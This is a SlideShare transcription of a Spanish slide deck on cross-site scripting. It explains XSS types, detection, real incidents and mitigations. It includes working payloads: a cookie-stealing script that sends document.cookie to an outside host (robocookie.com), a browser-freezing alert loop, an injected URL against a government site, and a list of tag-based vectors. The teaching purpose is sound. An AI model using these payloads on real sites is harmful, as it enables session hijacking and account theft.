SlideShare une entreprise Scribd logo
1  sur  38
www.1gbdeinformacion.com 1
2
Quien no soy
3
0. Un poco de historia
1. Introducción
2. Definición de ataques XSS
3. Tipos de ataques XSS
4. Partes de un ataque XSS
5. Detectar aplicación web
vulnerable
6. Ejemplos de ataques XSS
7. Soluciones a los ataques XSS
4
Un poco de Historia
5
¿Qué es XSS?
6
1. Introducción
Cross Site Scripting (XSS)
• Los ataques XSS se suelen llevar a cabo en paginas web que permitan ejecutar código
de scripting, como Javascript, Action Script o Ajax entre otros.
7
8
2. Definición de ataques XSS
¿En qué consiste?
9
2. Definición de ataques XSS
¿Cuándo una web es vulnerable?
10
2. Definición de ataques XSS
Riesgos
11
2. Definición de ataques XSS
Recursos utilizados
12
3. Tipos de ataques XSS
• No persistente
• Persistente
• DOM bassed
13
3. Tipos de ataques XSS
• No persistente
Vulnerabilidad encontrada por@Dylan_irzi11
14
3. Tipos de ataques XSS
• Persistente
15
<!-- Aclaración-->
16
XSS DOM Bassed
El resultado de www.vulnerable.com/userdashboard.html?context=Pedro
El HTML de www.vulnerable.com/userdashboard.html
17
4. Partes de un ataque XSS
• Inyección del código: Identificar que código se puede introducir.
• POC: ¿Qué puedes hacer con el XSS? ¿Robo de credenciales?, ¿defacement?, etc.
• Llevar a cabo el daño. Suplantación de identidad, envío de Spam, etc.
(Visto como el atacante)
18
5. Detectar aplicación web vulnerable
• Detectar la vulnerabilidad a través de formulario
Ej: <script>alert(“akil3s”);</script>
19
• Detectar la vulnerabilidad a través de URL
Ej: http://tuweb.com/index.html?nombre=<script>alert(“La alerta”);</script>
5. Detectar aplicación web vulnerable
Alberto Segura. http://elladodelnovato.blogspot.com.es/
20
6. Ejemplos de ataques XSS
Robo de cookies y sesión
<script language="javascript">alert(“TeRobolaCookie: " + document.cookie);</script>
<script>document.location.href = "http://robocookie.com/recibir.php?ck="+ document.cookie;</script>
Denegación de servicio al navegador
”><script>for (;;) alert("bucle"); </script>
21
22
6. Ejemplos de ataques XSS
Presidencia Española
23
La dirección completa a la que se apuntaba era la siguiente:
http://www.eu2010.es/en/resultadoBusqueda.html?query=%3Cscript%3Edocument.write%28%27%3Cimg
%20src%3D%22http%3A%2F%2Fblog.tmcnet.com%2Fblog%2Ftom-keating%2Fimages%2Fmr-
bean.jpg%22%20%2F%3E%27%29%3C%2Fscript%3E&index=buscadorGeneral_en
Análisis rápido:
Funcionalidad vulnerable: resultadoBusqueda.html
Parámetro vulnerable: query
Código inyectado en la web, interpretado por el navegador:
http://www.securitybydefault.com/2010/01/eu2010es-el-fail-es-para.html
Explicación del XSS a la web de la presidencia española.
24
6. Ejemplos de ataques XSS
25
6. Ejemplos de ataques XSS
26
6. Ejemplos de ataques XSS
Alberto Segura: http://elladodelnovato.blogspot.com.es/2013/01/vulnerabilidad-xss-en-twitter.html
Vectores de ataque mas utilizados:
• <SCRIPT> La más popular y conocida por todos  <SCRIPT> alert(“XSS”); </SCRIPT>
• <BODY> La etiqueta body puede embeber el script usando el evento onload  <BODY ONLOAD=alert("XSS")>
• <IMG> Algunos navegadores permiten ejecutar un script cuando encuentran la etiqueta img  <IMG SRC="javascript:alert('XSS');">
• <IFRAME> La etiqueta iframe permite importar HTML a una web y puede contener una secuencia de comandos 
<IFRAME SRC=”//webVulnerable.com/xss.html”>
• <INPUT> si el atributo de la etiqueta input esta establecido con image puede ser manipulado para ejecutar una secuencia de comandos 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
• <LINK> La etiqueta link a menudo se utiliza para vincular a las hojas de estilo (CSS) puede contener una secuencia de comandos 
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
• <TABLE> El atributo de fondo (background) se puede usar para hacer referencia a una secuencia de comandos en lugar de una imagen 
<TABLE BACKGROUND="javascript:alert('XSS')"> También es valido con <TD>  <TD BACKGROUND="javascript:alert('XSS')">
• <DIV> La etiqueta div, similar a table y td, también puede incorporar un script 
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));">
• <OBJECT> La etiqueta object se puede utilizar para lanzar un script desde un sitio externo 
<OBJECT TYPE="text/x-scriptlet" DATA="//webVulnerable.com/xss.html">
• <EMBED> Si el atacante quiere usar un script dentro de un archivo flash, lo haría así 
<EMBED SRC="//webVulnerable.com/xss.swf" AllowScriptAccess="always">
27
28
Time for demo
29
7. Soluciones a los ataques XSS
 Al diseñar las aplicaciones
• Se debe verificar siempre que el tipo de datos y la longitud de los campos se
correspondan con lo esperado.
30
7. Soluciones a los ataques XSS
 Usar las ultimas versiones de los navegadores
• Desde la versión de Internet Explorer 8 si intentas acceder a una página web que
ha sufrido un ataque XSS, aparece un mensaje avisando de que la web ha sido
modificada.
• Esto es debido a que el filtro Anti XSS de IE detecta la manipulación de la pagina
a través de la inyección de código en un parámetro.
* Por esto, es muy recomendable tener siempre actualizado todo el software de tu
equipo.
31
7. Soluciones a los ataques XSS
• El diseñador debe:
 Verificar el formato de los datos que van a poder introducir los usuarios.
 Codificar los datos visibles al usuario reemplazando los caracteres especiales.
 Revisar las cookies.
 El código introducido no puede ser superior a X caracteres.
 Al terminar una pagina web, contratar los servicios de un auditor de seguridad para
que haga una prueba antes de poner la web en producción.
32
7. Soluciones a los ataques XSS
• Ejemplo practico.
33
34
¡Espera!... En mi web uso filtros 
Y si uso filtros no pasa nada ¿no?
35
Y para ir terminando,
recordad…
Sitios vulnerables preparados para probar los ataques XSS
SPI Dynamics (live)
Cenzic (live)
Watchfire (live)
Acunetix (live) TestPHP TestASP TestASPNET
PCTechtips Challenge (live)
Mutillidae
The Butterfly Security Project
Updated HackmeBank
OWASP Vicnum
OWASP InsecureWebApp
OWASP SiteGenerator
Stanford SecuriBench
SecuriBench Micro
BadStore
WebMaven/Buggy Bank
Exploit-DB
36
37
Email: info@1gbdeinformacion.com
Blog: www.1gbdeinformacion.com
Twitter: @1Gbdeinfo
38

Contenu connexe

En vedette

T3ch fest leganes_final
T3ch fest leganes_finalT3ch fest leganes_final
T3ch fest leganes_finalRober Garamo
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que creesRober Garamo
 
Calculo y diseño de redes ip
Calculo y diseño de redes ipCalculo y diseño de redes ip
Calculo y diseño de redes ippbaezjluis
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Índice del libro "Hacking Web Technologies"
Índice del libro "Hacking Web Technologies"Índice del libro "Hacking Web Technologies"
Índice del libro "Hacking Web Technologies"Telefónica
 

En vedette (8)

T3ch fest leganes_final
T3ch fest leganes_finalT3ch fest leganes_final
T3ch fest leganes_final
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que crees
 
Xss attacks
Xss attacksXss attacks
Xss attacks
 
Calculo y diseño de redes ip
Calculo y diseño de redes ipCalculo y diseño de redes ip
Calculo y diseño de redes ip
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Índice del libro "Hacking Web Technologies"
Índice del libro "Hacking Web Technologies"Índice del libro "Hacking Web Technologies"
Índice del libro "Hacking Web Technologies"
 
Direccionamiento Ip Y Subredes Ejercicios Resueltos
Direccionamiento Ip Y Subredes Ejercicios ResueltosDireccionamiento Ip Y Subredes Ejercicios Resueltos
Direccionamiento Ip Y Subredes Ejercicios Resueltos
 

Similaire à Xss attacks V2.0

XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3tantascosasquenose
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Seguridad web
Seguridad webSeguridad web
Seguridad webcamposer
 
Racciatti Html Scripting Attacks
Racciatti Html Scripting AttacksRacciatti Html Scripting Attacks
Racciatti Html Scripting AttacksCristian Borghello
 
Curso basicoseguridadweb slideshare8
Curso basicoseguridadweb slideshare8Curso basicoseguridadweb slideshare8
Curso basicoseguridadweb slideshare8tantascosasquenose
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Seguridad web, ataque y defensa
Seguridad web, ataque y defensaSeguridad web, ataque y defensa
Seguridad web, ataque y defensaSantiago Bernal
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Exponiendo la verdad - C1b3rwall.pptx
Exponiendo la verdad - C1b3rwall.pptxExponiendo la verdad - C1b3rwall.pptx
Exponiendo la verdad - C1b3rwall.pptxDavidPadillaAlvarado
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios weblimahack
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applicationsEventos Creativos
 

Similaire à Xss attacks V2.0 (20)

Xss con javascript
Xss con javascriptXss con javascript
Xss con javascript
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Racciatti Html Scripting Attacks
Racciatti Html Scripting AttacksRacciatti Html Scripting Attacks
Racciatti Html Scripting Attacks
 
Curso basicoseguridadweb slideshare8
Curso basicoseguridadweb slideshare8Curso basicoseguridadweb slideshare8
Curso basicoseguridadweb slideshare8
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Seguridad web, ataque y defensa
Seguridad web, ataque y defensaSeguridad web, ataque y defensa
Seguridad web, ataque y defensa
 
Seguridad Web XSS y BeEF
Seguridad Web XSS y BeEFSeguridad Web XSS y BeEF
Seguridad Web XSS y BeEF
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Exponiendo la verdad - C1b3rwall.pptx
Exponiendo la verdad - C1b3rwall.pptxExponiendo la verdad - C1b3rwall.pptx
Exponiendo la verdad - C1b3rwall.pptx
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios web
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
 

Plus de Rober Garamo

Los peligros de internet
Los peligros de internetLos peligros de internet
Los peligros de internetRober Garamo
 
Contraseñas seguras
Contraseñas segurasContraseñas seguras
Contraseñas segurasRober Garamo
 
Como tener una contraseña segura
Como tener una contraseña seguraComo tener una contraseña segura
Como tener una contraseña seguraRober Garamo
 
Complementando el contro parental III
Complementando  el contro parental IIIComplementando  el contro parental III
Complementando el contro parental IIIRober Garamo
 
Complementando El control parental II de III
Complementando El control parental II de IIIComplementando El control parental II de III
Complementando El control parental II de IIIRober Garamo
 
Complementando el control parental I de III
Complementando el control parental I de IIIComplementando el control parental I de III
Complementando el control parental I de IIIRober Garamo
 
El control parental en Windows 7
El control parental en Windows 7El control parental en Windows 7
El control parental en Windows 7Rober Garamo
 

Plus de Rober Garamo (8)

Los peligros de internet
Los peligros de internetLos peligros de internet
Los peligros de internet
 
Contraseñas seguras
Contraseñas segurasContraseñas seguras
Contraseñas seguras
 
Empezando con mac
Empezando con macEmpezando con mac
Empezando con mac
 
Como tener una contraseña segura
Como tener una contraseña seguraComo tener una contraseña segura
Como tener una contraseña segura
 
Complementando el contro parental III
Complementando  el contro parental IIIComplementando  el contro parental III
Complementando el contro parental III
 
Complementando El control parental II de III
Complementando El control parental II de IIIComplementando El control parental II de III
Complementando El control parental II de III
 
Complementando el control parental I de III
Complementando el control parental I de IIIComplementando el control parental I de III
Complementando el control parental I de III
 
El control parental en Windows 7
El control parental en Windows 7El control parental en Windows 7
El control parental en Windows 7
 

Dernier

LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMLA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMalejandroortizm
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxchinojosa17
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAcoloncopias5
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.ayalayenifer617
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfDanielaEspitiaHerrer
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDLeslie Villar
 
PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...delvalleelizabeth400
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxmrzreyes12
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.Aldo Fernandez
 
PRESENTACION PASTORAL campeche 2024.pptx
PRESENTACION PASTORAL campeche  2024.pptxPRESENTACION PASTORAL campeche  2024.pptx
PRESENTACION PASTORAL campeche 2024.pptxIsaiasNozYerbes
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfYuriFuentesMartinez2
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...#LatamDigital
 
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdfDS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdfKAREN553987
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx241518192
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxssuser61dda7
 
Medios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxMedios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxUniversidad de Bielefeld
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxNicolas Villarroel
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)BrianaFrancisco
 
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIATALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIAobandopaula444
 

Dernier (19)

LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMLA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptx
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdf
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
 
PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptx
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
 
PRESENTACION PASTORAL campeche 2024.pptx
PRESENTACION PASTORAL campeche  2024.pptxPRESENTACION PASTORAL campeche  2024.pptx
PRESENTACION PASTORAL campeche 2024.pptx
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
 
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdfDS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
 
Medios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxMedios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptx
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptx
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)
 
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIATALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
 

Xss attacks V2.0

  • 3. 3 0. Un poco de historia 1. Introducción 2. Definición de ataques XSS 3. Tipos de ataques XSS 4. Partes de un ataque XSS 5. Detectar aplicación web vulnerable 6. Ejemplos de ataques XSS 7. Soluciones a los ataques XSS
  • 4. 4 Un poco de Historia
  • 6. 6 1. Introducción Cross Site Scripting (XSS) • Los ataques XSS se suelen llevar a cabo en paginas web que permitan ejecutar código de scripting, como Javascript, Action Script o Ajax entre otros.
  • 7. 7
  • 8. 8 2. Definición de ataques XSS ¿En qué consiste?
  • 9. 9 2. Definición de ataques XSS ¿Cuándo una web es vulnerable?
  • 10. 10 2. Definición de ataques XSS Riesgos
  • 11. 11 2. Definición de ataques XSS Recursos utilizados
  • 12. 12 3. Tipos de ataques XSS • No persistente • Persistente • DOM bassed
  • 13. 13 3. Tipos de ataques XSS • No persistente Vulnerabilidad encontrada por@Dylan_irzi11
  • 14. 14 3. Tipos de ataques XSS • Persistente
  • 16. 16 XSS DOM Bassed El resultado de www.vulnerable.com/userdashboard.html?context=Pedro El HTML de www.vulnerable.com/userdashboard.html
  • 17. 17 4. Partes de un ataque XSS • Inyección del código: Identificar que código se puede introducir. • POC: ¿Qué puedes hacer con el XSS? ¿Robo de credenciales?, ¿defacement?, etc. • Llevar a cabo el daño. Suplantación de identidad, envío de Spam, etc. (Visto como el atacante)
  • 18. 18 5. Detectar aplicación web vulnerable • Detectar la vulnerabilidad a través de formulario Ej: <script>alert(“akil3s”);</script>
  • 19. 19 • Detectar la vulnerabilidad a través de URL Ej: http://tuweb.com/index.html?nombre=<script>alert(“La alerta”);</script> 5. Detectar aplicación web vulnerable Alberto Segura. http://elladodelnovato.blogspot.com.es/
  • 20. 20 6. Ejemplos de ataques XSS Robo de cookies y sesión <script language="javascript">alert(“TeRobolaCookie: " + document.cookie);</script> <script>document.location.href = "http://robocookie.com/recibir.php?ck="+ document.cookie;</script>
  • 21. Denegación de servicio al navegador ”><script>for (;;) alert("bucle"); </script> 21
  • 22. 22 6. Ejemplos de ataques XSS Presidencia Española
  • 23. 23 La dirección completa a la que se apuntaba era la siguiente: http://www.eu2010.es/en/resultadoBusqueda.html?query=%3Cscript%3Edocument.write%28%27%3Cimg %20src%3D%22http%3A%2F%2Fblog.tmcnet.com%2Fblog%2Ftom-keating%2Fimages%2Fmr- bean.jpg%22%20%2F%3E%27%29%3C%2Fscript%3E&index=buscadorGeneral_en Análisis rápido: Funcionalidad vulnerable: resultadoBusqueda.html Parámetro vulnerable: query Código inyectado en la web, interpretado por el navegador: http://www.securitybydefault.com/2010/01/eu2010es-el-fail-es-para.html Explicación del XSS a la web de la presidencia española.
  • 24. 24 6. Ejemplos de ataques XSS
  • 25. 25 6. Ejemplos de ataques XSS
  • 26. 26 6. Ejemplos de ataques XSS Alberto Segura: http://elladodelnovato.blogspot.com.es/2013/01/vulnerabilidad-xss-en-twitter.html
  • 27. Vectores de ataque mas utilizados: • <SCRIPT> La más popular y conocida por todos  <SCRIPT> alert(“XSS”); </SCRIPT> • <BODY> La etiqueta body puede embeber el script usando el evento onload  <BODY ONLOAD=alert("XSS")> • <IMG> Algunos navegadores permiten ejecutar un script cuando encuentran la etiqueta img  <IMG SRC="javascript:alert('XSS');"> • <IFRAME> La etiqueta iframe permite importar HTML a una web y puede contener una secuencia de comandos  <IFRAME SRC=”//webVulnerable.com/xss.html”> • <INPUT> si el atributo de la etiqueta input esta establecido con image puede ser manipulado para ejecutar una secuencia de comandos  <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> • <LINK> La etiqueta link a menudo se utiliza para vincular a las hojas de estilo (CSS) puede contener una secuencia de comandos  <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> • <TABLE> El atributo de fondo (background) se puede usar para hacer referencia a una secuencia de comandos en lugar de una imagen  <TABLE BACKGROUND="javascript:alert('XSS')"> También es valido con <TD>  <TD BACKGROUND="javascript:alert('XSS')"> • <DIV> La etiqueta div, similar a table y td, también puede incorporar un script  <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> • <OBJECT> La etiqueta object se puede utilizar para lanzar un script desde un sitio externo  <OBJECT TYPE="text/x-scriptlet" DATA="//webVulnerable.com/xss.html"> • <EMBED> Si el atacante quiere usar un script dentro de un archivo flash, lo haría así  <EMBED SRC="//webVulnerable.com/xss.swf" AllowScriptAccess="always"> 27
  • 29. 29 7. Soluciones a los ataques XSS  Al diseñar las aplicaciones • Se debe verificar siempre que el tipo de datos y la longitud de los campos se correspondan con lo esperado.
  • 30. 30 7. Soluciones a los ataques XSS  Usar las ultimas versiones de los navegadores • Desde la versión de Internet Explorer 8 si intentas acceder a una página web que ha sufrido un ataque XSS, aparece un mensaje avisando de que la web ha sido modificada. • Esto es debido a que el filtro Anti XSS de IE detecta la manipulación de la pagina a través de la inyección de código en un parámetro. * Por esto, es muy recomendable tener siempre actualizado todo el software de tu equipo.
  • 31. 31 7. Soluciones a los ataques XSS • El diseñador debe:  Verificar el formato de los datos que van a poder introducir los usuarios.  Codificar los datos visibles al usuario reemplazando los caracteres especiales.  Revisar las cookies.  El código introducido no puede ser superior a X caracteres.  Al terminar una pagina web, contratar los servicios de un auditor de seguridad para que haga una prueba antes de poner la web en producción.
  • 32. 32 7. Soluciones a los ataques XSS • Ejemplo practico.
  • 33. 33
  • 34. 34 ¡Espera!... En mi web uso filtros  Y si uso filtros no pasa nada ¿no?
  • 35. 35 Y para ir terminando, recordad…
  • 36. Sitios vulnerables preparados para probar los ataques XSS SPI Dynamics (live) Cenzic (live) Watchfire (live) Acunetix (live) TestPHP TestASP TestASPNET PCTechtips Challenge (live) Mutillidae The Butterfly Security Project Updated HackmeBank OWASP Vicnum OWASP InsecureWebApp OWASP SiteGenerator Stanford SecuriBench SecuriBench Micro BadStore WebMaven/Buggy Bank Exploit-DB 36
  • 38. 38